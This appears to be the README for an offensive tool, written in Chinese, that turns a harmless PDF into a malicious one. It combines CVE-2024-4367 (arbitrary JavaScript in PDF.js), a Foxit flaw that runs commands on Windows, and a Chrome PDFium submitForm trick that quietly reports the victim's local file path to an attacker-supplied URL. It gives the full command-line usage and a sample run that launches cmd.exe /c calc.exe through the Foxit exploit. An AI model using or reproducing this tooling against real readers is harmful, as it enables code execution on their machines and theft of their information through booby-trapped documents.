集成近期的一些 pdf 解析器的漏洞,制作 PDF 文档。
usage:
usage: pdf-exploit [-h] -f F [-p P] -o O [-pdfjs PDFJS] [-foxit-exec FOXIT_EXEC] [-foxit-args FOXIT_ARGS] [-submitForm SUBMITFORM] options: -h, --help show this help message and exit -f F the harmless pdf path -p P password -o O the new pdf file pdfjs: CVE-2024-4367 -pdfjs PDFJS javascript to be executed, example: alert(3) foxit: foxit pdf 'flawed design' explotation -foxit-exec FOXIT_EXEC -foxit-args FOXIT_ARGS chrome: use submitForm of pdfium to steal pdf file path and other information -submitForm SUBMITFORM The url to which the pdf path will be reported
example:
➜ pdf-exploit ./pdf.py -f ~/Downloads/data.pdf -o /tmp/data.pdf -pdfjs 'alert(3)' -foxit-exec cmd.exe -foxit-args "/c calc.exe" [+] use the PDF.JS exploit: alert(3) [+] make a text pdf [+] make evil font [+] fd ref: 9 [+] add font object to pdf: 10 [+] set font: /F1 [+] use the foxit exploit: cmd.exe /c calc.exe set OpenAction to Catalog done [+] store to /tmp/data.pdf
目前支持:
- CVE-2024-4367: PDF.js 解析 pdf 时存在缺陷,可以执行任意的 javascript 脚本。
- Foxit PDF 机制缺陷,windows平台下可以执行远程命令(有弹窗提醒)。
- Chrome: 借助 submitForm 来窃取对应 pdf 文件在本地的路径信息(需要点击 pdf 文件任意位置,但用户无感)